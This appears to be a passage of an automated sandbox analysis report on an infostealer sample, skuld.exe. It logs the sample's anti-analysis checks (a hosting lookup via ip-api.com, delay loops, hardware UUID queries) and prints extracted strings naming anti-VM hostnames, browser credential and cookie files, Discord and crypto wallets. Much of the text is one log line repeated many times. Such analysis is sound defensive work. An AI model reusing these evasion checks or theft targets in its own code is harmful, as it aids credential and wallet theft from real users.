                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Check if machine is in data center or colocation facility
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                        Tries to delay execution (extensive OutputDebugStringW loop)
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: OutputDebugStringW count: 1944
                        Source: C:\Users\user\Desktop\skuld.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3745Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6081Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4638
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4224
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5952
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3484
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.dllJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2172Thread sleep count: 3745 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4656Thread sleep count: 6081 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4788Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4760Thread sleep time: -8301034833169293s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1612Thread sleep count: 5952 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6588Thread sleep count: 3484 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4632Thread sleep time: -5534023222112862s >= -30000s
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\skuld.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: SecurityHealthSystray.exe.0.drBinary or memory string: OpenEventAUnlockFileunrechableno consoleenter-fastCounterKDFRIPEMD-160impossible[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]rune <nil>image: NewBM????res binderres masterresumptionexp masterContent-IdMessage-IdHTTP_PROXYhttp_proxyhttp2debugrsa1024mincrypto/rsacrypto/tlsx509rsacrtParseAddr(invalid IPClassCSNETClassCHAOSAdditionalskipping: SHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1base_nonceML-KEM-768ML-KEM PCTPOSTALCODEavx512ifmaavx512vbmiavx512vnniavx512gfniavx512vaesavx512bf16EnumWindowsOpenProcessvboxservicecodecrackerBAROSINO-PCCOFFEE-SHOParchibaldpcARCHIBALDPCLANTECH-LLCALENMOOS-PC9yjCPsEYIMHnoK4zG7ZhOfOgJb6GqgK0OnZAp7UBVaS1xPLyvzr8sgCBvJChRPnsxnykj0egq7fzeuHUQIuwoEFUkFu0lQwgX5PryjIJKIrOMs4tgiizsLimS95.25.81.2435.199.6.1334.105.0.2780.211.0.9778.139.8.50totalav.comadaware.comThunderbirdTarget Pathcookies.txt%-70s %-70shistory.txtdescriptionCrypt32.dllLocal StateCentBrowserFiles Foundmot_de_passFatal ErrorMessageBoxW`
                        Source: SecurityHealthSystray.exe.0.drBinary or memory string: Handshakemath/randClassINETAuthorityquestionscSHAKE128info_hashuser32.dllvmwaretrayxenservicevmwareusermegadumperscyllahidevirtualboxPxmdUOpVyxQ9IATRKPRHPaul Jonesd1bnJkfVlHQarZhrdBpjPC-DANIELEqarzhrdbpjq9iatrkprhd1bnjkfvlhJUDES-DOJOGJAm1NxXVmdOuyo8RV7105KvAUQKPQOf20XqH4VLpxmduopvyxJcOtj17dZxcM0uEGN4do64F2tKIqO5GexwjQdjXGfNBDSlDTXYmcafee.comnorton.comzillya.comsophos.comclamav.netpowershellsystemrootlogins.txtLogin DataChrome SxS360BrowserUR BrowserdiscordptbinitiationByHackirbysecure.datauto_startsteam-tempEpic Games.minecraftRiot GamesShowWindow-NoProfileExtensionsExodusWeb3PaliWalletwinsymlink/dev/stdinCreateFileterminatedowner diedDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionWSACleanupWSAStartupgetsockoptsetsockoptdnsapi.dllws2_32.dllexecerrdotSYSTEMROOTavatar_url
                        Source: SecurityHealthSystray.exe.0.drBinary or memory string: res binderres masterresumptionexp masterContent-IdMessage-IdHTTP_PROXYhttp_proxyhttp2debugrsa1024mincrypto/rsacrypto/tlsx509rsacrtParseAddr(invalid IPClassCSNETClassCHAOSAdditionalskipping: SHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1base_nonceML-KEM-768ML-KEM PCTPOSTALCODEavx512ifmaavx512vbmiavx512vnniavx512gfniavx512vaesavx512bf16EnumWindowsOpenProcessvboxservicecodecrackerBAROSINO-PCCOFFEE-SHOParchibaldpcARCHIBALDPCLANTECH-LLCALENMOOS-PC9yjCPsEYIMHnoK4zG7ZhOfOgJb6GqgK0OnZAp7UBVaS1xPLyvzr8sgCBvJChRPnsxnykj0egq7fzeuHUQIuwoEFUkFu0lQwgX5PryjIJKIrOMs4tgiizsLimS95.25.81.2435.199.6.1334.105.0.2780.211.0.9778.139.8.50totalav.comadaware.comThunderbirdTarget Pathcookies.txt%-70s %-70shistory.txtdescriptionCrypt32.dllLocal StateCentBrowserFiles Foundmot_de_passFatal ErrorMessageBoxW`
